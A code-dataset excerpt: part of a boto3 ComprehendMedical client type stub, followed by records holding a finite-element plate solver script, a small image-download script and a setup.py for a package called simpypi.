DescribePHIDetectionJobResponseTypeDef,\n DescribeRxNormInferenceJobResponseTypeDef,\n DescribeSNOMEDCTInferenceJobResponseTypeDef,\n DetectEntitiesResponseTypeDef,\n DetectEntitiesV2ResponseTypeDef,\n DetectPHIResponseTypeDef,\n InferICD10CMResponseTypeDef,\n InferRxNormResponseTypeDef,\n InferSNOMEDCTResponseTypeDef,\n InputDataConfigTypeDef,\n ListEntitiesDetectionV2JobsResponseTypeDef,\n ListICD10CMInferenceJobsResponseTypeDef,\n ListPHIDetectionJobsResponseTypeDef,\n ListRxNormInferenceJobsResponseTypeDef,\n ListSNOMEDCTInferenceJobsResponseTypeDef,\n OutputDataConfigTypeDef,\n StartEntitiesDetectionV2JobResponseTypeDef,\n StartICD10CMInferenceJobResponseTypeDef,\n StartPHIDetectionJobResponseTypeDef,\n StartRxNormInferenceJobResponseTypeDef,\n StartSNOMEDCTInferenceJobResponseTypeDef,\n StopEntitiesDetectionV2JobResponseTypeDef,\n StopICD10CMInferenceJobResponseTypeDef,\n StopPHIDetectionJobResponseTypeDef,\n StopRxNormInferenceJobResponseTypeDef,\n StopSNOMEDCTInferenceJobResponseTypeDef,\n)\n\nif sys.version_info >= (3, 8):\n from typing import Literal\nelse:\n from typing_extensions import Literal\n\n__all__ = (\"ComprehendMedicalClient\",)\n\nclass BotocoreClientError(BaseException):\n MSG_TEMPLATE: str\n\n def __init__(self, error_response: Dict[str, Any], operation_name: str) -> None:\n self.response: Dict[str, Any]\n self.operation_name: str\n\nclass Exceptions:\n ClientError: Type[BotocoreClientError]\n InternalServerException: Type[BotocoreClientError]\n InvalidEncodingException: Type[BotocoreClientError]\n InvalidRequestException: Type[BotocoreClientError]\n ResourceNotFoundException: Type[BotocoreClientError]\n ServiceUnavailableException: Type[BotocoreClientError]\n TextSizeLimitExceededException: Type[BotocoreClientError]\n TooManyRequestsException: Type[BotocoreClientError]\n ValidationException: Type[BotocoreClientError]\n\nclass ComprehendMedicalClient(BaseClient):\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html)\n \"\"\"\n\n meta: ClientMeta\n\n @property\n def exceptions(self) -> Exceptions:\n \"\"\"\n ComprehendMedicalClient exceptions.\n \"\"\"\n def can_paginate(self, operation_name: str) -> bool:\n \"\"\"\n Check if an operation can be paginated.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.can_paginate)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#can_paginate)\n \"\"\"\n def close(self) -> None:\n \"\"\"\n Closes underlying endpoint connections.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.close)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#close)\n \"\"\"\n def describe_entities_detection_v2_job(\n self, *, JobId: str\n ) -> DescribeEntitiesDetectionV2JobResponseTypeDef:\n \"\"\"\n Gets the properties associated with a medical entities detection job.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.describe_entities_detection_v2_job)\n [Show boto3-stubs 
documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#describe_entities_detection_v2_job)\n \"\"\"\n def describe_icd10_cm_inference_job(\n self, *, JobId: str\n ) -> DescribeICD10CMInferenceJobResponseTypeDef:\n \"\"\"\n Gets the properties associated with an InferICD10CM job.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.describe_icd10_cm_inference_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#describe_icd10_cm_inference_job)\n \"\"\"\n def describe_phi_detection_job(self, *, JobId: str) -> DescribePHIDetectionJobResponseTypeDef:\n \"\"\"\n Gets the properties associated with a protected health information (PHI)\n detection job.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.describe_phi_detection_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#describe_phi_detection_job)\n \"\"\"\n def describe_rx_norm_inference_job(\n self, *, JobId: str\n ) -> DescribeRxNormInferenceJobResponseTypeDef:\n \"\"\"\n Gets the properties associated with an InferRxNorm job.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.describe_rx_norm_inference_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#describe_rx_norm_inference_job)\n \"\"\"\n def describe_snomedct_inference_job(\n self, *, JobId: str\n ) -> DescribeSNOMEDCTInferenceJobResponseTypeDef:\n \"\"\"\n Gets the properties associated with an InferSNOMEDCT job.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.describe_snomedct_inference_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#describe_snomedct_inference_job)\n \"\"\"\n def detect_entities(self, *, Text: str) -> DetectEntitiesResponseTypeDef:\n \"\"\"\n The `DetectEntities` operation is deprecated.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.detect_entities)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#detect_entities)\n \"\"\"\n def detect_entities_v2(self, *, Text: str) -> DetectEntitiesV2ResponseTypeDef:\n \"\"\"\n Inspects the clinical text for a variety of medical entities and returns\n specific information about them such as entity category, location, and\n confidence score on that information.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.detect_entities_v2)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#detect_entities_v2)\n \"\"\"\n def detect_phi(self, *, Text: str) -> DetectPHIResponseTypeDef:\n \"\"\"\n Inspects the clinical text for protected health information (PHI) entities and\n returns the entity category, location, and confidence score for each entity.\n\n [Show boto3 
documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.detect_phi)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#detect_phi)\n \"\"\"\n def generate_presigned_url(\n self,\n ClientMethod: str,\n Params: Dict[str, Any] = None,\n ExpiresIn: int = 3600,\n HttpMethod: str = None,\n ) -> str:\n \"\"\"\n Generate a presigned url given a client, its method, and arguments.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.generate_presigned_url)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#generate_presigned_url)\n \"\"\"\n def infer_icd10_cm(self, *, Text: str) -> InferICD10CMResponseTypeDef:\n \"\"\"\n InferICD10CM detects medical conditions as entities listed in a patient record\n and links those entities to normalized concept identifiers in the ICD-10-CM\n knowledge base from the Centers for Disease Control.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.infer_icd10_cm)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#infer_icd10_cm)\n \"\"\"\n def infer_rx_norm(self, *, Text: str) -> InferRxNormResponseTypeDef:\n \"\"\"\n InferRxNorm detects medications as entities listed in a patient record and links\n to the normalized concept identifiers in the RxNorm database from the National\n Library of Medicine.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.infer_rx_norm)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#infer_rx_norm)\n \"\"\"\n def infer_snomedct(self, *, Text: str) -> InferSNOMEDCTResponseTypeDef:\n \"\"\"\n InferSNOMEDCT detects possible medical concepts as entities and links them to\n codes from the Systematized Nomenclature of Medicine, Clinical Terms (SNOMED-CT)\n ontology See also: `AWS API Documentation `_ **Re...\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.infer_snomedct)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#infer_snomedct)\n \"\"\"\n def list_entities_detection_v2_jobs(\n self,\n *,\n Filter: \"ComprehendMedicalAsyncJobFilterTypeDef\" = None,\n NextToken: str = None,\n MaxResults: int = None\n ) -> ListEntitiesDetectionV2JobsResponseTypeDef:\n \"\"\"\n Gets a list of medical entity detection jobs that you have submitted.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.list_entities_detection_v2_jobs)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#list_entities_detection_v2_jobs)\n \"\"\"\n def list_icd10_cm_inference_jobs(\n self,\n *,\n Filter: \"ComprehendMedicalAsyncJobFilterTypeDef\" = None,\n NextToken: str = None,\n MaxResults: int = None\n ) -> ListICD10CMInferenceJobsResponseTypeDef:\n \"\"\"\n Gets a list of InferICD10CM jobs that 
you have submitted.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.list_icd10_cm_inference_jobs)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#list_icd10_cm_inference_jobs)\n \"\"\"\n def list_phi_detection_jobs(\n self,\n *,\n Filter: \"ComprehendMedicalAsyncJobFilterTypeDef\" = None,\n NextToken: str = None,\n MaxResults: int = None\n ) -> ListPHIDetectionJobsResponseTypeDef:\n \"\"\"\n Gets a list of protected health information (PHI) detection jobs that you have\n submitted.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.list_phi_detection_jobs)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#list_phi_detection_jobs)\n \"\"\"\n def list_rx_norm_inference_jobs(\n self,\n *,\n Filter: \"ComprehendMedicalAsyncJobFilterTypeDef\" = None,\n NextToken: str = None,\n MaxResults: int = None\n ) -> ListRxNormInferenceJobsResponseTypeDef:\n \"\"\"\n Gets a list of InferRxNorm jobs that you have submitted.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.list_rx_norm_inference_jobs)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#list_rx_norm_inference_jobs)\n \"\"\"\n def list_snomedct_inference_jobs(\n self,\n *,\n Filter: \"ComprehendMedicalAsyncJobFilterTypeDef\" = None,\n NextToken: str = None,\n MaxResults: int = None\n ) -> ListSNOMEDCTInferenceJobsResponseTypeDef:\n \"\"\"\n Gets a list of InferSNOMEDCT jobs a user has submitted.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.list_snomedct_inference_jobs)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#list_snomedct_inference_jobs)\n \"\"\"\n def start_entities_detection_v2_job(\n self,\n *,\n InputDataConfig: \"InputDataConfigTypeDef\",\n OutputDataConfig: \"OutputDataConfigTypeDef\",\n DataAccessRoleArn: str,\n LanguageCode: Literal[\"en\"],\n JobName: str = None,\n ClientRequestToken: str = None,\n KMSKey: str = None\n ) -> StartEntitiesDetectionV2JobResponseTypeDef:\n \"\"\"\n Starts an asynchronous medical entity detection job for a collection of\n documents.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.start_entities_detection_v2_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#start_entities_detection_v2_job)\n \"\"\"\n def start_icd10_cm_inference_job(\n self,\n *,\n InputDataConfig: \"InputDataConfigTypeDef\",\n OutputDataConfig: \"OutputDataConfigTypeDef\",\n DataAccessRoleArn: str,\n LanguageCode: Literal[\"en\"],\n JobName: str = None,\n ClientRequestToken: str = None,\n KMSKey: str = None\n ) -> StartICD10CMInferenceJobResponseTypeDef:\n \"\"\"\n Starts an asynchronous job to detect medical conditions and link them to the\n ICD-10-CM ontology.\n\n [Show boto3 
documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.start_icd10_cm_inference_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#start_icd10_cm_inference_job)\n \"\"\"\n def start_phi_detection_job(\n self,\n *,\n InputDataConfig: \"InputDataConfigTypeDef\",\n OutputDataConfig: \"OutputDataConfigTypeDef\",\n DataAccessRoleArn: str,\n LanguageCode: Literal[\"en\"],\n JobName: str = None,\n ClientRequestToken: str = None,\n KMSKey: str = None\n ) -> StartPHIDetectionJobResponseTypeDef:\n \"\"\"\n Starts an asynchronous job to detect protected health information (PHI).\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.start_phi_detection_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#start_phi_detection_job)\n \"\"\"\n def start_rx_norm_inference_job(\n self,\n *,\n InputDataConfig: \"InputDataConfigTypeDef\",\n OutputDataConfig: \"OutputDataConfigTypeDef\",\n DataAccessRoleArn: str,\n LanguageCode: Literal[\"en\"],\n JobName: str = None,\n ClientRequestToken: str = None,\n KMSKey: str = None\n ) -> StartRxNormInferenceJobResponseTypeDef:\n \"\"\"\n Starts an asynchronous job to detect medication entities and link them to the\n RxNorm ontology.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.start_rx_norm_inference_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#start_rx_norm_inference_job)\n \"\"\"\n def start_snomedct_inference_job(\n self,\n *,\n InputDataConfig: \"InputDataConfigTypeDef\",\n OutputDataConfig: \"OutputDataConfigTypeDef\",\n DataAccessRoleArn: str,\n LanguageCode: Literal[\"en\"],\n JobName: str = None,\n ClientRequestToken: str = None,\n KMSKey: str = None\n ) -> StartSNOMEDCTInferenceJobResponseTypeDef:\n \"\"\"\n Starts an asynchronous job to detect medical concepts and link them to the\n SNOMED-CT ontology.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.start_snomedct_inference_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#start_snomedct_inference_job)\n \"\"\"\n def stop_entities_detection_v2_job(\n self, *, JobId: str\n ) -> StopEntitiesDetectionV2JobResponseTypeDef:\n \"\"\"\n Stops a medical entities detection job in progress.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.stop_entities_detection_v2_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#stop_entities_detection_v2_job)\n \"\"\"\n def stop_icd10_cm_inference_job(self, *, JobId: str) -> StopICD10CMInferenceJobResponseTypeDef:\n \"\"\"\n Stops an InferICD10CM inference job in progress.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.stop_icd10_cm_inference_job)\n [Show boto3-stubs 
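# ---------------------------------------------------------------------------
# A hypothetical smoke test for the client these stubs describe (region and
# input text are illustrative; detect_entities_v2 is the synchronous call
# documented above):
import boto3

from mypy_boto3_comprehendmedical import ComprehendMedicalClient

client: ComprehendMedicalClient = boto3.client("comprehendmedical", region_name="us-east-1")
resp = client.detect_entities_v2(Text="Patient was given 40 mg of aspirin daily.")
for entity in resp["Entities"]:
    print(entity["Category"], entity["Text"], round(entity["Score"], 2))
# ---------------------------------------------------------------------------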
documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#stop_icd10_cm_inference_job)\n \"\"\"\n def stop_phi_detection_job(self, *, JobId: str) -> StopPHIDetectionJobResponseTypeDef:\n \"\"\"\n Stops a protected health information (PHI) detection job in progress.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.stop_phi_detection_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#stop_phi_detection_job)\n \"\"\"\n def stop_rx_norm_inference_job(self, *, JobId: str) -> StopRxNormInferenceJobResponseTypeDef:\n \"\"\"\n Stops an InferRxNorm inference job in progress.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.stop_rx_norm_inference_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#stop_rx_norm_inference_job)\n \"\"\"\n def stop_snomedct_inference_job(self, *, JobId: str) -> StopSNOMEDCTInferenceJobResponseTypeDef:\n \"\"\"\n Stops an InferSNOMEDCT inference job in progress.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.stop_snomedct_inference_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#stop_snomedct_inference_job)\n \"\"\"\n","sub_path":"typings/mypy_boto3/comprehendmedical/client.pyi","file_name":"client.pyi","file_ext":"pyi","file_size_in_byte":21323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"207224530","text":"import numpy as np \nimport itertools as it\nimport math as mi\ndef u_arrangement(data,Global_displacement,s,u_element,t):\n for name, age in data.items(): # find the key whose value matches s\n if age == s:\n i=name\n u_element[t][0]=Global_displacement[i][0]\n u_element[t+1][0]=Global_displacement[i+1][0]\n return u_element\n\ndef assemble_function(data,Assignment_matrixs,s,j):\n for name, age in data.items(): # find the key whose value matches s\n if age == s:\n i=name\n Assignment_matrixs[j][i]=1\n Assignment_matrixs[j+1][i+1]=1\n return(Assignment_matrixs)\n\ndef Material_routine(MU,lamda,u_element,B):\n #material routine will return the C_t matrix\n C_elastic=np.array([[2*MU+lamda,lamda,0],[lamda,2*MU+lamda,0],[0,0,MU]])\n C_tangential=C_elastic \n Strain_element=np.zeros((3,1))\n Strain_element= B @ u_element \n print(\"Strain_element:\\n\",Strain_element)\n stress_element= C_tangential @ Strain_element\n return [C_tangential,stress_element]\n\ndef Element_routine(Xe,Element_stiffness_matrixs,MU,lamda,u_element,F_int_Element,Le,thickness_plate):\n #element routine will return the element stiffness matrix\n x_values=np.array([-0.57735,-0.57735,0.57735,-0.57735,-0.57735,0.57735,0.57735,0.57735])\n Element_stiffness_matrixs=np.zeros((8,8))\n F_int_Element=np.zeros((8,1))\n for i in range(0,8,2):\n x1=x_values[i]\n x2=x_values[i+1]\n derivative_x= np.array([[-(1-x2),(1-x2),-(1+x2),(1+x2)],[-(1-x1),-(1+x1),(1-x1),(1+x1)]]) * (1/4)\n Jacobin_matrixs = derivative_x @ Xe\n B_vector= np.linalg.inv(Jacobin_matrixs) @ derivative_x\n 
B=np.array([[B_vector[0][0],0,B_vector[0][1],0,B_vector[0][2],0,B_vector[0][3],0],[0,B_vector[1][0],0,B_vector[1][1],0,B_vector[1][2],0,B_vector[1][3]],[B_vector[1][0],B_vector[0][0],B_vector[1][1],B_vector[0][1],B_vector[1][2],B_vector[0][2],B_vector[1][3],B_vector[0][3]]])\n [C_tangential,stress_element]=Material_routine(MU,lamda,u_element,B) \n Element_stiffness_matrixs= Element_stiffness_matrixs + (np.transpose(B) @ C_tangential @ B)* np.linalg.det(Jacobin_matrixs)*thickness_plate\n F_int_Element= F_int_Element + (np.transpose(B) @ stress_element ) * np.linalg.det(Jacobin_matrixs)*thickness_plate\n #F_int_Element_1= Element_stiffness_matrixs @ u_element\n #if(np.linalg.norm(F_int_Element)==np.linalg.norm(F_int_Element_1)):\n #print(\"yes\")\n return [Element_stiffness_matrixs,F_int_Element]\n\n#Elastic program for 2D Bilinear Element \n#Here, we are considering a point load for building the basic structure of the required element\n#internal parameters\nyield_stress=70*10**-6\nYoungs_modulus=210E9 #N/m^2\nPoissons_ratio=0.30\nMU=(Youngs_modulus/(2*(1+Poissons_ratio)))\nlamda=((Poissons_ratio*Youngs_modulus)/((1-2*Poissons_ratio)*(1+Poissons_ratio)))\nprint(MU)\nprint(lamda)\nL= eval(input('Enter the length of the plate in meters\\n'))\nheight_plate = eval(input('Enter the height of the plate in meters\\n'))\nthickness_plate = eval(input(\"Enter the thickness of the plate in meters\\n\"))\nN=eval(input('Enter the number of elements in the x-direction\\n'))\nM=eval(input('Enter the number of elements in the y-direction\\n'))\nLe=L/N #element length\nHe=height_plate/M #element height\ntotal_nodes= (N+1)*(M+1)\nprint(total_nodes)\ndelta_u=np.zeros((2*total_nodes,1))\nElement_stiffness_matrixs=np.zeros((8,8))\nGlobal_F_external=np.zeros((2*total_nodes,1))\nGlobal_plastic_strain=np.zeros((3,M*N))\nGlobal_displacement=np.zeros((2*total_nodes,1))\nu_element=np.zeros((8,1))\nF_int_Element=np.zeros((8,1))\n#print(\"Enter the forces value in newton for each node of interest\\n\")\n#print(\"Enter zero if no force is applied on the node\\n\")\n# The force part should be made incremental after figuring out the flow of the program\nXe=np.array([[0,0],[Le,0],[0,He],[Le,He]])\nx_disp=np.array([[Le,0],[Le,0],[Le,0],[Le,0]])\ny_disp=np.array([[0,He],[0,He],[0,He],[0,He]])\nNode_Numbering= np.zeros(((M+1),(N+1)))\ns=0\ns1=0\ns2=0\ns3=0\ns4=0\nk=1\nk1=0\ndata={}\nR_delta_u=np.ones((2*total_nodes,1))\nfor i in range(0,2*total_nodes,2):\n k1=k1+1\n data.update({i:k1})\nfor i in range(0,M+1):\n for j in range(0,N+1):\n Node_Numbering[i][j]=k \n k=k+1\nprint(Node_Numbering)\ncount=0\n\nwhile(np.linalg.norm(R_delta_u,np.inf) > (0.005*np.linalg.norm(Global_displacement,np.inf))):\n count=count+1\n Global_stiffness_matrixs=np.zeros((2*total_nodes,2*total_nodes))\n Global_F_internal=np.zeros((2*total_nodes,1))\n print(np.linalg.norm(R_delta_u,np.inf))\n print(np.linalg.norm(Global_displacement,np.inf))\n for i in range(0,M):\n for j in range(0,N):\n Assignment_matrixs=np.zeros((8,2*total_nodes))\n s=i\n s1=Node_Numbering[s][j] #s1-first node of the local element\n s2=Node_Numbering[s][j+1] #s2-second node of the local element\n s3=Node_Numbering[s+1][j] #s3-third node of the local element\n s4=Node_Numbering[s+1][j+1] #s4-fourth node of the local element\n print('Element node:',s1,s2,s3,s4)\n Assignment_matrixs=assemble_function(data,Assignment_matrixs,s1,0)\n Assignment_matrixs=assemble_function(data,Assignment_matrixs,s2,2)\n Assignment_matrixs=assemble_function(data,Assignment_matrixs,s3,4)\n 
Assignment_matrixs=assemble_function(data,Assignment_matrixs,s4,6)\n u_element=u_arrangement(data,Global_displacement,s1,u_element,0)\n u_element=u_arrangement(data,Global_displacement,s2,u_element,2)\n u_element=u_arrangement(data,Global_displacement,s3,u_element,4)\n u_element=u_arrangement(data,Global_displacement,s4,u_element,6)\n if (j>0):\n Xe = Xe + x_disp\n [Element_stiffness_matrixs,F_int_Element] = Element_routine(Xe,Element_stiffness_matrixs,MU,lamda,u_element,F_int_Element,Le,thickness_plate)\n Global_stiffness_matrixs=Global_stiffness_matrixs + (np.transpose(Assignment_matrixs) @ Element_stiffness_matrixs @ Assignment_matrixs)\n F=(np.transpose(Assignment_matrixs) @ F_int_Element)\n Global_F_internal=Global_F_internal + F\n if((M*N)>1):\n Xe=Xe + y_disp \n print('The obtained stiffness matrix is:\\n')\n print(Global_stiffness_matrixs)\n print(\"Internal_force:\\n\")\n print(Global_F_internal)\n Global_F_external[3][0]=-100\n #Global_F_external[6][0]=-100\n G=Global_F_internal-Global_F_external\n print(\"G:\",G)\n Reduced_Global_stiffness_matrix=Global_stiffness_matrixs\n Reduced_displacement=Global_displacement\n Reduced_G=G\n A=[]\n #Reduction of matrix sizes\n for j in range(0,M+1,1): \n for name, age in data.items(): # find the key whose value matches the node number\n if age == Node_Numbering[j][0]:\n i=name\n A.append(i)\n A.append(i+1)\n A=np.asarray(A)\n print(A)\n #A=np.delete(A,[2,3],axis=0)\n if(count==1):\n R_delta_u=np.delete(delta_u,A,axis=0)\n Reduced_Global_stiffness_matrix= np.delete(Reduced_Global_stiffness_matrix,A,axis=0)\n Reduced_Global_stiffness_matrix= np.delete(Reduced_Global_stiffness_matrix,A,axis=1)\n Reduced_G=np.delete(Reduced_G,A,axis=0)\n Reduced_displacement=np.delete(Reduced_displacement,A,axis=0)\n #Reduced_F_ext=np.delete(Global_F_external,A,axis=0)\n #calculation part\n print(\"reduced k matrix\",Reduced_Global_stiffness_matrix)\n K_inv=np.linalg.inv(Reduced_Global_stiffness_matrix)\n #R_delta_u= K_inv @ Reduced_F_ext\n #print(R_delta_u)\n print(\"Reduced G\",Reduced_G)\n R_delta_u=(np.linalg.inv(Reduced_Global_stiffness_matrix)) @ Reduced_G\n print(\"r_DELTA_U\",R_delta_u)\n Reduced_displacement=Reduced_displacement - R_delta_u\n for i in range(0,len(A),1):\n Reduced_displacement=np.insert(Reduced_displacement,A[i],Global_displacement[A[i]])\n #R_delta_u=np.insert(R_delta_u,A[i],delta_u[i])\n Global_displacement=(Reduced_displacement.reshape(2*total_nodes,1))\nprint(\"displacement:\\n\",Global_displacement)\nprint(\"Iteration number:\",count)","sub_path":"elastic_file.py","file_name":"elastic_file.py","file_ext":"py","file_size_in_byte":8110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"32246496","text":"import requests\nimport os\nurl = \"http://i0.hdslb.com/bfs/article/b394991940df5df463669e17f76ef40f83b47fc3.jpg\"\nroot = \"D:/360MoveData/Users/Windows10/Desktop/爬虫/\"\t\t#save location\n#keep the image's original name from the url\npath = root +url.split('/')[-1]\ntry:\n #create the folder if it does not exist\n if not os.path.exists(root):\n os.mkdir(root)\n #only download if the file does not already exist\n if not os.path.exists(path):\n r = requests.get(url)\n with open(path, 'wb') as f:\n f.write(r.content)\n f.close()\n print(\"File saved successfully\")\n else:\n print(\"File already exists\")\nexcept:\n print(\"Download failed\")\n","sub_path":"python/jupyter/jupyter/爬虫查看/爬虫下载代码.py","file_name":"爬虫下载代码.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"242495101","text":"from setuptools import setup, find_packages\n\ntry:\n description = 
file('README.txt').read()\nexcept IOError:\n description = ''\n\nversion = \"0.1.3\"\n\nsetup(name='simpypi',\n version=version,\n description=\"Simple pypi package\",\n long_description=description,\n classifiers=[], # Get strings from http://www.python.org/pypi?%3Aaction=list_classifiers\n author='Jeff Hammel',\n author_email='jhammel@mozilla.com',\n url='http://k0s.org/mozilla/hg/simpypi',\n license=\"MPL\",\n packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n # -*- Extra requirements: -*-\n 'WebOb',\n 'pkginfo',\n 'FileServer >= 0.2.1'\n ],\n entry_points=\"\"\"\n # -*- Entry points: -*-\n [console_scripts]\n simpypi = simpypi.factory:main\n \"\"\",\n )\n","sub_path":"pypi_install_script/simpypi-0.1.3.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
